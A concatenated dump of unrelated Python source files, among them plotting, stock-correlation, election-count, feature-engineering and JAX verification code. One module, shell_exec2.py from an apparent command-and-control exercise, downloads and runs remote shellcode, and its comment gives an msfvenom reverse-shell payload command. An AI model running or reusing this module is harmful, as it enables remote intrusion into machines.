Signal(inDimension,outDimension,numTrials,numPlots=plots)\n\n # In this case, since we are only loading the model, not trying to train it,\n # we can use function simulate and preprocess \n xData,yData = sig.system_validation_multi(disturbance=False,b_possible_values=[.299,.3005],a_possible_values=[.899,.9005],\n k_possible_values=[0,1])\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \n # Initialize the models that are saved using the parameters declared above\n predictor = Model()\n predictor.load_model(sig,path)\n \n sns.set_style('dark')\n # Function to make predictions based off the simulation \n kp_yhat = predictor.predict_multinomial(sig,stepResponse=False)\n #tau_yhat = self.modelDict['tau'](sig.xData['tau'])\n #theta_yhat = self.modelDict['theta'](sig.xData['theta'])\n fig, ax_nstd = plt.subplots(figsize=(6, 6),dpi=200)\n #ax_nstd.set_xlim([0.475,0.535])\n #ax_nstd.set_ylim([0.475,0.535])\n \n x=predictor.results['a'];y=predictor.results['b']\n confidence_ellipse(x, y, ax_nstd, n_std=1,\n label=r'$1\\sigma$', edgecolor='firebrick')\n confidence_ellipse(x, y, ax_nstd, n_std=2,\n label=r'$2\\sigma$', edgecolor='fuchsia', linestyle='--')\n confidence_ellipse(x, y, ax_nstd, n_std=3,\n label=r'$3\\sigma$', edgecolor='blue', linestyle=':')\n\n ax_nstd.scatter(predictor.results['a'], predictor.results['b'], s=3)\n #ax_nstd.set_title('Different standard deviations')\n plt.ylabel('Coefficient a')\n plt.xlabel('Coefficient b')\n ax_nstd.legend(loc='lower left')\n plt.grid()\n plt.show()\n \n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \n ","sub_path":"src/Plot_ellipses.py","file_name":"Plot_ellipses.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"293176359","text":"# Author: Griffin Melnick, melnig@rpi.edu\n# File: word_ladder.py\n# Purpose: A game using word ladders to connect a start word to an end word.\n# => Look at https://en.wikipedia.org/wiki/Word_ladder for more\n# information about the game.\n# => This code comes from:\n# https://github.com/networkx/networkx/blob/master/examples/graph/words.py\n\nimport networkx as nx\n\n#-------------------------------------------------------------------\n# The Words/Ladder graph of Section 1.1\n#-------------------------------------------------------------------\ndef generate_graph(words):\n from string import ascii_lowercase as lowercase\n G = nx.Graph(name=\"words\")\n lookup = dict((c,lowercase.index(c)) for c in lowercase)\n def edit_distance_one(word):\n for i in range(len(word)):\n left, c, right = word[0:i], word[i], word[i+1:]\n j = lookup[c] # lowercase.index(c)\n for cc in lowercase[j+1:]:\n yield left + cc + right\n yield right + cc + left\n yield cc + left + right\n yield cc + right + left\n yield left + right + cc\n yield right + left + cc\n candgen = ((word, cand) for word in sorted(words)\n for cand in edit_distance_one(word) if cand in words)\n G.add_nodes_from(words)\n for word, cand in candgen:\n G.add_edge(word, cand)\n return G\n\ndef words_graph():\n \"\"\"Return the words example graph from the Stanford GraphBase\"\"\"\n import gzip\n fh=gzip.open('words_dat.txt.gz','r')\n words=set()\n for line in fh.readlines():\n line = line.decode()\n if line.startswith('*'):\n continue\n w=str(line[0:5])\n words.add(w)\n return generate_graph(words)\n\nif __name__ == '__main__':\n from networkx import *\n G=words_graph()\n # print(\"Loaded words_dat.txt containing 5757 five-letter English words.\")\n # print(\"Two words are connected if they differ in one letter.\")\n # print(\"Graph has %d nodes with %d edges\"\n # %(number_of_nodes(G),number_of_edges(G)))\n # print(\"%d connected components\" % number_connected_components(G))\n\n # for (source,target) in [('chaos','order'),\n # ('nodes','graph'),\n # ('moron','smart'),\n # ('pound','marks'),('queue','choir')]:\n # print(\"Shortest path between %s and %s is:\"%(source,target))\n # try:\n # sp=shortest_path(G, source, target)\n # for n in sp:\n # print(n)\n # except nx.NetworkXNoPath:\n # print(\"None\")\n\n # print()\n\n # for elem in G:\n # d = 0\n # e = \"\"\n # if len(G[elem]) > d:\n # d = len(G[elem])\n # e = elem\n # print(elem)\n\n n = 0\n for elem in G[\"shape\"]:\n n += len(G[elem])\n print(n)\n","sub_path":"labs/lab06/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"246128439","text":"import streamlit as st\r\nimport yfinance as yf\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nst.write(\"\"\"\r\n# Stock Correlation Application\r\nInsert two stocks to determine how strongly correlated they are\r\n\"\"\")\r\n\r\nstock_1 = st.text_input(\"Insert Ticker Symbol for First Stock (e.g., AAPL)\")\r\nstock_2 = st.text_input(\"Insert Ticker Symbol for Second Stock (e.g., AMZN)\")\r\n\r\nif stock_2 and stock_1:\r\n\r\n #get data on this ticker\r\n\r\n stock_1_tickerData = yf.Ticker(stock_1)\r\n stock_2_tickerData = yf.Ticker(stock_2)\r\n\r\n #get the historical prices for this ticker\r\n stock_1_tickerDf = stock_1_tickerData.history(period='max').reset_index()\r\n stock_2_tickerDf = stock_2_tickerData.history(period= 'max').reset_index()\r\n\r\n stock_1_tickerDf['stock'] = stock_1\r\n stock_2_tickerDf['stock'] = stock_2\r\n\r\n min_stock_1 = min(stock_1_tickerDf['Date'])\r\n min_stock_2 = min(stock_2_tickerDf['Date'])\r\n\r\n max_min_stock_date = max([min_stock_1, min_stock_2])\r\n\r\n stock_1_tickerDf = stock_1_tickerDf.loc[stock_1_tickerDf['Date'] >= max_min_stock_date]\r\n stock_2_tickerDf = stock_2_tickerDf.loc[stock_2_tickerDf['Date'] >= max_min_stock_date]\r\n\r\n df_1 = stock_2_tickerDf\r\n df_2 = stock_2_tickerDf\r\n\r\n stock_1_tickerDf.columns = ['Date', 'stock_1_Open', 'stock_1_High', 'stock_1_Low', 'stock_1_Close', 'stock_1_Volume', 'stock_1_Dividends',\r\n 'stock_1_Stock Splits', 'stock_1']\r\n\r\n stock_2_tickerDf.columns = ['Date', 'stock_2_Open', 'stock_2_High', 'stock_2_Low', 'stock_2_Close', 'stock_2_Volume', 'stock_2_Dividends',\r\n 'stock_2_Stock Splits', 'stock_2']\r\n\r\n bigdata = stock_1_tickerDf.merge(stock_2_tickerDf, how = 'inner', on = 'Date')\r\n\r\n correlation = round(bigdata.stock_1_Close.corr(bigdata.stock_2_Close),2)\r\n\r\n st_plot = bigdata[['Date', 'stock_1_Close','stock_2_Close']]\r\n st_plot.columns = ['Date', \"{0} Stock Price\".format(stock_1), \"{0} Stock Price\".format(stock_2)]\r\n\r\n df = st_plot.melt('Date', var_name='stock', value_name='value')\r\n\r\n\r\n sns.set(font=\"IBM Plex Sans\", style='white')\r\n color_palette = ['29bf89','0083BB']\r\n fig, ax = plt.subplots()\r\n ax = sns.lineplot(x = 'Date', y = st_plot.iloc[:,1], data=st_plot, color='seagreen')\r\n ax2 = plt.twinx()\r\n ax= sns.lineplot(data=st_plot, color='royalblue', ax=ax2, x = 'Date', y = st_plot.iloc[:,2])\r\n ax.set_title(\"The correlation between {0} and {1} is: {2} \".format(stock_1, stock_2, correlation))\r\n plt.figure(facecolor='w')\r\n fig.legend(labels=[\"{0} Stock\".format(stock_1),\"{0} Stock\".format(stock_2)],loc=\"upper center\", bbox_to_anchor=(0.5, 1.05), ncol=2)\r\n\r\n st.pyplot(fig)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"stock_correlations.py","file_name":"stock_correlations.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"630383148","text":"import os\r\nimport csv\r\n\r\ncsvpath = os.path.join('Resources', 'election_data.csv')\r\n\r\nwith open(csvpath) as csvfile:\r\n\r\n# CSV reader specifies delimiter and variable that holds contents\r\n csvreader = csv.reader(csvfile, delimiter=',')\r\n\r\n #print(csvreader)\r\n\r\n # Read the header row first (skip this step if there is now header)\r\n csv_header = next(csvreader)\r\n #print(f\"CSV Header: {csv_header}\")\r\n \r\n # Checking num columns and rows\r\n # print(len(row)) \r\n # Total number of votes\r\n Num_row = len(open(csvpath).readlines()) - 1\r\n # print(Num_row)\r\n\r\n Candidate = \"\"\r\n voteKhan = 0\r\n voteCorrey = 0\r\n voteLi = 0\r\n voteOTooley = 0\r\n for row in csvreader:\r\n if row[2] == \"Khan\":\r\n voteKhan = voteKhan + 1\r\n if row[2] == \"Correy\":\r\n voteCorrey = voteCorrey + 1\r\n if row[2] == \"Li\":\r\n voteLi = voteLi + 1\r\n if row[2] == \"O'Tooley\":\r\n voteOTooley = voteOTooley + 1\r\n\r\n print(\"Election Results\")\r\n print(\"----------------------\")\r\n print(\"Total Votes:\", Num_row)\r\n print(\"Khan:\", (\"{:.3f}\".format(100*voteKhan/Num_row)), \"% (\", voteKhan, \")\" )\r\n print(\"Correy:\", (\"{:.3f}\".format(100*voteCorrey/Num_row)), \"% (\", voteCorrey, \")\" )\r\n print(\"Li:\", (\"{:.3f}\".format(100*voteLi/Num_row)), \"% (\", voteLi, \")\" )\r\n print(\"O'Tooley:\", (\"{:.3f}\".format(100*voteOTooley/Num_row)), \"% (\", voteOTooley, \")\" )\r\n print(\"----------------------\")\r\n print(\"Winner: Khan\")\r\n print(\"----------------------\")\r\n\r\n with open(\"pypoll_final_result.text\", 'w') as text:\r\n text.write('Election Results \\n')\r\n text.write('----------------------------------- \\n')\r\n text.write(f'Total Votes: {Num_row} \\n')\r\n text.write('----------------------------------- \\n')\r\n text.write(f'Khan: {(\"{:.3f}\".format(100*voteKhan/Num_row))}% ({voteKhan}) \\n')\r\n text.write(f'Correy: {(\"{:.3f}\".format(100*voteCorrey/Num_row))}% ({voteCorrey}) \\n')\r\n text.write(f'Li: {(\"{:.3f}\".format(100*voteLi/Num_row))}% ({voteLi}) \\n')\r\n text.write(f'O Tooley: {(\"{:.3f}\".format(100*voteOTooley/Num_row))}% ({voteOTooley}) \\n')\r\n text.write('----------------------------------- \\n')\r\n text.write('Winner: Khan \\n')\r\n text.write('----------------------------------- \\n')\r\n\r\n\r\n \r\n\r\n\r\n\r\n","sub_path":"PyBank/mainPyPoll.py","file_name":"mainPyPoll.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364168863","text":"import os\nimport numpy as np\nimport pandas as pd\n\n\n# Helper functions.\ndef zero_crossing(x):\n \"\"\"\n Count the number of times the signal value changed signs.\n \"\"\"\n return sum((x.iloc[:-1] * x.shift(-1).iloc[:-1]) < 0)\n\n\ndef percentile(p):\n \"\"\"\n Helper function to compute percentile p.\n \"\"\"\n def percentile_(x):\n return np.percentile(x, p)\n percentile_.__name__ = 'percentile_%s' % p\n return percentile_\n\n\ndef add_mean_last3(w1_df, w10_df):\n \"\"\"\n Compute mean of last 3 seconds from each 10-second window and join back\n to w10 dataframe.\n \"\"\"\n new = w1_df.groupby(['pid', 'window10']).tail(3).groupby(['pid', 'window10']).mean().reset_index()\\\n .drop(['window1'], axis=1)\n new.columns = ['_'.join([col, 'last3']) for col in new.columns.values]\n new = new.rename(columns={'pid_last3': 'pid',\n 'window10_last3': 'window10'})\n return pd.merge(w10_df, new, how='left', on=['pid', 'window10'])\n\n\ndef add_mean_first3(w1_df, w10_df):\n \"\"\"\n Compute mean of first 3 seconds from each 10-second window \n and join back to w10 dataframe.\n \"\"\"\n new = w1_df.groupby(['pid', 'window10']).head(3).groupby(['pid', 'window10']).mean().reset_index()\\\n .drop(['window1'], axis=1)\n new.columns = ['_'.join([col, 'first3']) for col in new.columns.values]\n new = new.rename(columns={'pid_first3': 'pid',\n 'window10_first3': 'window10'})\n return pd.merge(w10_df, new, how='left', on=['pid', 'window10'])\n\n\n# Windowing functions.\ndef pivot_window_10s_from_ms(df):\n \"\"\"\n Given millisecond-level data, compute 'mean', median', 'min', 'max', 'std', \n percentiles, and zero-crossing per 10-second window.\n Pivot into a single row (uniquely identified by window10-pid).\n \"\"\"\n df['window10'] = np.floor(df['time'] / 10000).astype(int)\n df = df.groupby(['pid', 'window10'])[['x', 'y', 'z']]\\\n .agg(['mean', 'median', 'min', 'max', 'std',\n percentile(5), percentile(25), percentile(75), percentile(95), zero_crossing])\n df.columns = ['_'.join([str(c) for c in col]).strip()\n for col in df.columns.values]\n df = df.reset_index()\n return df.reset_index()\n\n\ndef pivot_window_1s(df):\n \"\"\"\n Compute 'mean', median', 'min', 'max', 'std' per 1-second window per pid \n and pivot into a single row (uniquely identified by window1-pid).\n\n Input df columns: ['x', 'y', 'z']\n Output df columns: ['x_median', 'x_min',...'z_median']\n \"\"\"\n df['window1'] = np.floor(df['time'] / 1000).astype(int)\n df = df.groupby(['pid', 'window1'])[['x', 'y', 'z']]\\\n .agg(['mean', 'median', 'min', 'max', 'std'])\n df.columns = ['_'.join([str(c) for c in col]).strip()\n for col in df.columns.values]\n return df.reset_index()\n\n\ndef pivot_window_10s_from_1s(df):\n \"\"\"\n Calls pivot_window_1s to compute 1-second window metrics.\n\n Compute 'mean', median', 'min', 'max', 'std', 'first3_mean', 'last3_mean',\n of computed 1-second window metrics per 10-second window per pid \n and pivot into a single row (uniquely identified by window10-pid).\n\n Input df columns: ['x_median', 'y_median','z_median',...]\n Output df columns: ['x_median_mean', 'y_median_mean', 'z_median_mean', 'x_median_median',...]\n \"\"\"\n w1 = pivot_window_1s(df)\n w1['window10'] = np.floor(w1['window1'] / 10).astype(int)\n two_tier_df = w1.groupby(['pid', 'window10'])[w1.drop(['pid', 'window1', 'window10'], axis=1).columns]\\\n .agg(['mean', 'median', 'min', 'max', 'std'])\n two_tier_df.columns = ['_'.join([str(c) for c in col]).strip()\n for col in two_tier_df.columns.values]\n two_tier_df = two_tier_df.reset_index()\n # Compute mean of first and last 3 seconds within the 10-second window.\n two_tier_df = add_mean_last3(w1, two_tier_df)\n two_tier_df = add_mean_first3(w1, two_tier_df)\n # Impute nan standard deviation (when window10 is a single row) as 0.\n two_tier_df = two_tier_df.fillna(0)\n return two_tier_df\n\n\ndef two_tier_windowing(df):\n \"\"\"\n Run single and two-tier windowing functions \n and merge generated features together.\n\n Returns a dataframe with all features.\n \"\"\"\n single_tier = pivot_window_10s_from_ms(df)\n two_tier = pivot_window_10s_from_1s(df)\n return pd.merge(single_tier, two_tier, how='left', on=['pid', 'window10'])\n\n\ndef run_feature_engineering(acc_path):\n \"\"\"\n Load each preprocessed accelerometer file and\n create all features using two-tiered windowing.\n \n Returns a concatenated dataframe with\n accelerometer data for all participants.\n \"\"\"\n dfs = []\n directory = os.fsencode(acc_path)\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename != '.DS_Store':\n print(filename)\n df = pd.read_pickle(acc_path + filename)\n df = two_tier_windowing(df)\n dfs.append(df)\n return pd.concat(dfs).reset_index().drop(columns=['level_0', 'index'], axis=1)\n\n\n# Joining target to features.\ndef reconcile_acc_tac(acc, tac):\n \"\"\"\n Merge target \"intoxicated\" variable onto windowed accelerometer df by taking the most \n recent target value where tac timestamp (10s window) <= acc timestamp (10s window)\n for a given pid.\n \"\"\"\n # Create window10 timestamp on tac df.\n tac['window10'] = np.floor(tac['timestamp'] / 10).astype(int)\n # Sort both df by window10.\n acc = acc.sort_values(['window10'], ascending=True)\n tac = tac.sort_values(['window10'], ascending=True)\n # Merge the last row in tac whose tac timestamp <= to the acc timestamp.\n return pd.merge_asof(acc, tac, on='window10', by='pid').reset_index(drop=True)\n\n","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":5769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458557450","text":"sim_t = \"Simulator\"\nproj_t = \"Project\"\npref_t = \"Prefetcher\"\nbench_t = \"Benchmark\"\n\nstat_t = \"Statistic Tag\"\n\nipc_t = \"IPC\"\nallAcc_t = \"All Accesses\"\nallMiss_t = \"All Misses\"\nprefAcc_t = \"Prefetcher Accesses\"\nprefs_t = \"Prefetches\"\naccPref_t = \"Accurate Prefetches\"\n\ndata_tags = [ipc_t,allAcc_t,allMiss_t,prefAcc_t,prefs_t,accPref_t]\nall_tags = [proj_t,pref_t,bench_t] + data_tags\n","sub_path":"branch_predictor/cbp2014/results/analysis/scripts/tools/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"321849809","text":"import handler\r\nimport helpers\r\nimport wishDB\r\nimport messageDB\r\n\r\nclass Wish():\r\n\tpass\r\n\t\t\r\nclass AdminWishlistHandler(handler.Handler):\r\n\t@helpers.login_required\r\n\tdef get(self):\t\r\n\t\twishes = []\r\n\t\tresults = wishDB.Wish.all().order('-created').run(limit=10)\r\n\t\t\r\n\t\tfor wish in results:\r\n\t\t\tid = int(wish.key().id())\r\n\t\t\tres_msg = messageDB.Message.all().filter(\"wish_id =\", id)\r\n\t\t\twi = Wish()\r\n\t\t\twi.wish = wish\r\n\t\t\twi.messages = []\r\n\t\t\twi.msg_date = []\r\n\t\t\tif res_msg:\r\n\t\t\t\tfor msg in res_msg:\r\n\t\t\t\t\twi.messages.append(msg.content)\r\n\t\t\t\t\twi.msg_date.append(msg.created)\r\n\t\t\twi.messages.sort(reverse = True)\r\n\t\t\twishes.append(wi)\r\n\t\tself.render(\"admin/wishlist-admin.html\", wishes = wishes)\r\n\t\r\n\t@helpers.login_required\r\n\tdef post(self):\r\n\t\tid = int(self.request.get('id'))\r\n\t\twishes = []\r\n\t\tlast_wish = wishDB.Wish.get_by_id(id)\r\n\t\tresults = wishDB.Wish.all()\r\n\t\tresults.filter('created <', last_wish.created)\r\n\t\tresults.order('-created').run(limit=10)\r\n\t\t\r\n\t\t\r\n\t\tfor wish in results:\r\n\t\t\t#wishes.append(wish)\r\n\t\t\tid = int(wish.key().id())\r\n\t\t\tres_msg = messageDB.Message.all().filter(\"wish_id =\", id)\r\n\t\t\twi = wishDB.Wish()\r\n\t\t\twi.wish = wish\r\n\t\t\twi.messages = []\r\n\t\t\twi.msg_date = []\r\n\t\t\tif res_msg:\r\n\t\t\t\tfor msg in res_msg:\r\n\t\t\t\t\twi.messages.append(msg.content)\r\n\t\t\t\t\twi.msg_date.append(msg.created)\r\n\t\t\twi.messages.sort(reverse = True)\r\n\t\t\twishes.append(wi)\r\n\t\t\t\r\n\t\tself.render(\"admin/load-wishes-admin.html\", wishes = wishes)","sub_path":"adminwishlist.py","file_name":"adminwishlist.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"397617575","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, models\nfrom odoo.addons.l10n_gt_extra import a_letras\n\nclass ReportAbstractPayment(models.AbstractModel):\n _name = 'onyx.abstract.reporte_account_payment'\n\n def fecha_a_letras(self,fecha):\n fecha_letras = \"\"\n dia = fecha.strftime('%d')\n mes = int(fecha.strftime('%m'))\n mes_letras = a_letras.mes_a_letras(mes-1)\n anio = fecha.strftime('%Y')\n fecha_letras = dia + \" de \" + mes_letras.capitalize() + \" del \" + anio\n return fecha_letras\n\n def totales(self, o):\n t = {'debito': 0, 'credito': 0}\n for l in o.move_id.line_ids:\n t['debito'] += l.debit\n t['credito'] += l.credit\n return t\n\n def _get_report_values(self, docids, data=None):\n model = 'account.payment'\n docs = self.env['account.payment'].browse(docids)\n\n return {\n 'doc_ids': docids,\n 'doc_model': model,\n 'docs': docs,\n 'data': data,\n 'a_letras': a_letras.num_a_letras,\n 'fecha_a_letras': self.fecha_a_letras,\n 'totales': self.totales,\n }\n\nclass ReportPayment1(models.AbstractModel):\n _name = 'report.onyx.reporte_account_payment1'\n _inherit = 'onyx.abstract.reporte_account_payment'\n","sub_path":"report/report_payment.py","file_name":"report_payment.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152792249","text":"# coding=utf-8\n# Copyright 2021 The jax_verify Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utils used for JAX neural network verification.\"\"\"\n\nimport os\nfrom typing import Any, Callable, Dict, Sequence, Union\nimport jax\nimport jax.numpy as jnp\nfrom jax_verify.src import bound_propagation\nimport numpy as np\nimport urllib.request\n\n\nTensor = bound_propagation.Tensor\nBound = bound_propagation.Bound\n\n######## File Loading ########\n\ndef open_file(name, *open_args, **open_kwargs):\n \"\"\"Load file, downloading to /tmp/jax_verify first if necessary.\"\"\"\n local_root = '/tmp/jax_verify'\n local_path = os.path.join(local_root, name)\n if not os.path.exists(os.path.dirname(local_path)):\n os.makedirs(os.path.dirname(local_path))\n if not os.path.exists(local_path):\n gcp_bucket_url = 'https://storage.googleapis.com/deepmind-jax-verify/'\n download_url = gcp_bucket_url + name\n urllib.request.urlretrieve(download_url, local_path)\n return open(local_path, *open_args, **open_kwargs)\n\n######### Miscellaneous #########\n\n\ndef bind_nonbound_args(\n fun: Callable[..., Tensor],\n *all_in_args: Union[Bound, Tensor],\n **kwargs\n) -> Callable[..., Tensor]:\n \"\"\"Take a function and bind all keyword arguments and non-bound arguments.\"\"\"\n\n def tensorbound_fun(*bound_args):\n fun_inps = []\n bound_arg_pos = 0\n for arg in all_in_args:\n if isinstance(arg, Bound):\n fun_inps.append(bound_args[bound_arg_pos])\n bound_arg_pos += 1\n else:\n fun_inps.append(arg)\n assert len(bound_args) == bound_arg_pos\n return fun(*fun_inps, **kwargs)\n return tensorbound_fun\n\n\ndef filter_jaxverify_kwargs(kwargs: Dict[str, Any]) -> Dict[str, Any]:\n if 'jax_verify_keepjvargs' in kwargs and kwargs['jax_verify_keepjvargs']:\n return kwargs\n else:\n return {k: v for k, v in kwargs.items()\n if not k.startswith('jax_verify_subgraph')}\n\n\ndef simple_propagation(fn):\n \"\"\"Create a wrapper function to ignore the context argument.\"\"\"\n def wrapper(context, *args, **kwargs):\n del context\n params = filter_jaxverify_kwargs(kwargs)\n return fn(*args, **params)\n return wrapper\n\n\ndef batch_value_and_grad(fun, batch_dims, *args, **kwargs):\n \"\"\"Equivalent to jax `value_and_grad` function but allows batched function.\n\n This is to go around the fact that jax.value_and_grad only supports scalar\n outputs.\n\n Args:\n fun: Function, operating in batch, to obtain gradients for.\n batch_dims: Dimensions to batch over.\n *args: Positional arguments for jax.value_and_grad\n **kwargs: Named arguments for jax.value_and_grad.\n Returns:\n batch_value_and_grad_fn: Function returning the value and gradients of the\n batched function\n \"\"\"\n add_batch_dim = lambda x: jnp.expand_dims(x, batch_dims)\n remove_batch_dim = lambda x: x.squeeze(batch_dims)\n def nobatch_fun(*nobatch_inps):\n batch_inps = jax.tree_util.tree_multimap(add_batch_dim, nobatch_inps)\n batch_out = fun(*batch_inps)\n nobatch_out = jax.tree_util.tree_multimap(remove_batch_dim, batch_out)\n return nobatch_out\n nobatch_value_and_grad = jax.value_and_grad(nobatch_fun, *args, **kwargs)\n\n batch_value_and_grad_fn = nobatch_value_and_grad\n for batch_dim in batch_dims:\n batch_value_and_grad_fn = jax.vmap(batch_value_and_grad_fn,\n in_axes=batch_dim, out_axes=batch_dim)\n return batch_value_and_grad_fn\n\n\ndef objective_chunk(\n obj_shape: Sequence[int],\n chunk_index: int,\n nb_parallel_nodes: int,\n):\n \"\"\"Returns a one-hot tensor to select a chunk of elements from an objective.\n\n Args:\n obj_shape: Shape of the objective tensor to be chunked.\n chunk_index: Index of the optimization chunk to generate.\n nb_parallel_nodes: How large should the optimization chunks be. If 0,\n optimize all problems at once.\n Returns:\n One-hot tensor of shape (nb_parallel_nodes, *obj_shape) specifying,\n for each index in the chunk, an element of the objective.\n \"\"\"\n total_nb_nodes_to_opt = int(np.prod(obj_shape))\n\n start_node = chunk_index * nb_parallel_nodes\n if (nb_parallel_nodes == 0) or (total_nb_nodes_to_opt <= nb_parallel_nodes):\n nb_nodes_to_opt = total_nb_nodes_to_opt\n else:\n nb_nodes_to_opt = nb_parallel_nodes\n\n # In order to be able to use the function in the while loop, we have to have\n # all tensors remain the same size so we're going to always create a tensor\n # of the same size, but will not necessarily fill all the rows.\n flat_obj = jnp.zeros((nb_nodes_to_opt, total_nb_nodes_to_opt))\n opt_idx = jnp.arange(nb_nodes_to_opt)\n node_idx = jnp.minimum(start_node + opt_idx, total_nb_nodes_to_opt-1)\n to_add = ((start_node + opt_idx) < total_nb_nodes_to_opt).astype(jnp.float32)\n flat_obj = jax.ops.index_add(\n flat_obj, (opt_idx, node_idx), to_add,\n indices_are_sorted=True, unique_indices=False)\n obj = jnp.reshape(flat_obj, (nb_nodes_to_opt, *obj_shape))\n\n return obj\n\n\n","sub_path":"jax_verify/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22920519","text":"from setuptools import setup, find_packages\nfrom os import path\n\n# grab the long_description from the readme file\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(name=\"mtdependencytest\",\n description=\"depends\",\n version=\"0.0.2\",\n packages=find_packages(),\n long_description = \"Sorry, long description not available.\",\n url = \"https://github.com/teese/mtdependencytest\",\n license = \"MIT\",\n classifiers=[\"Development Status :: 3 - Alpha\"],\n py_modules = [\"bla\"],\n keywords=\"lovely beautiful\"\n )","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"434502620","text":"import sqlite3 as lite\n\n\ncities = (('New York City','NY'),('Boston','MA'),('Chicago','IL'),('Miami','FL'),('Dallas','TX'),('Seattle','WA'),('Portland','OR'),('San Francisco','CA'),('Los Angeles','CA'))\nweather = (('New York City',2013,'July','January',62),('Boston',2013,'July','January',59),('Chicago',2013,'July','January',59),('Miami',2013,'August','January',84),('Dallas',2013,'July','January',77),('Seattle',2013,'July','January',61),('Portland',2013,'July','December',63),('San Francisco',2013,'September','December',64),('Los Angeles',2013,'September','December',75))\n\ncon = lite.connect('getting_started.db')\n\nwith con:\n\tcur = con.cursor()\n\tcur.execute(\"DROP TABLE cities\")\n\tcur.execute(\"DROP TABLE weather\")\n\tcur.execute(\"CREATE TABLE cities (city text, state text)\")\n\tcur.execute(\"CREATE TABLE weather (city text, year integer, warm_month text, cold_month text, average_high text)\")\n\tcur.executemany(\"INSERT INTO cities VALUES(?,?)\", cities)\n\tcur.executemany(\"INSERT INTO weather VALUES(?,?,?,?,?)\", weather)","sub_path":"rows_sqlite.py","file_name":"rows_sqlite.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"624180277","text":"import argparse\nimport numpy as np\nimport cv2\n\n\ndef get_noise_model(noise_type=\"gaussian,0,50\"):\n tokens = noise_type.split(sep=\",\")\n\n if tokens[0] == \"gaussian\":\n min_stddev = int(tokens[1])\n max_stddev = int(tokens[2])\n\n def gaussian_noise(img):\n noise_img = img.astype(np.float)\n stddev = np.random.uniform(min_stddev, max_stddev)\n noise = np.random.randn(*img.shape) * stddev\n noise_img += noise\n noise_img = np.clip(noise_img, 0, 255).astype(np.uint8)\n return noise_img\n return gaussian_noise\n elif tokens[0] == \"clean\":\n return lambda img: img\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"test noise model\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--image_size\", type=int, default=256,\n help=\"training patch size\")\n parser.add_argument(\"--noise_model\", type=str, default=\"gaussian,0,50\",\n help=\"noise model to be tested\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = get_args()\n image_size = args.image_size\n noise_model = get_noise_model(args.noise_model)\n\n while True:\n image = np.ones((image_size, image_size, 3), dtype=np.uint8) * 128\n cv2.imshow(\"noise image\", noise_model(image))\n key = cv2.waitKey(-1)\n\n # \"q\": quit\n if key == 113:\n return 0\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"noise_model.py","file_name":"noise_model.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"482523870","text":"import requests\nimport ctypes\nimport base64\nimport subprocess\n\n\ndef run(**args):\n if 'test' in args and args['test']==True:\n return 'Shell code could be running'\n if 'url' in args:\n url = args['url']\n\n # Retrieve the shell code and decode it ('only accept \"bin\" files')\n if url[-3:] == 'bin':\n response = requests.get(url)\n shellcode = base64.b64decode(response.text)\n print(shellcode, end='')\n subprocess.call('' + shellcode.decode())\n\n\nif __name__ == '__main__':\n run(test=False, url='http://10.1.22.123:8000/shell.bin')\n\n\n'''\nShell generated using:\n\nmsfvenom -p cmd/windows/reverse_powershell LHOST=\"###.###.###.###\" LPORT=\"####\" -b '\\x00\\xff' --encoder cmd/powershell_base64 -i 2 -f raw -o w64_r_t.raw\nbase64 -i w64_r_t.raw > shell.bin\n'''","sub_path":"07-08-GitCnC/modules/shell_exec2.py","file_name":"shell_exec2.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"581259497","text":"\"\"\"\r\nA class for points polylines and 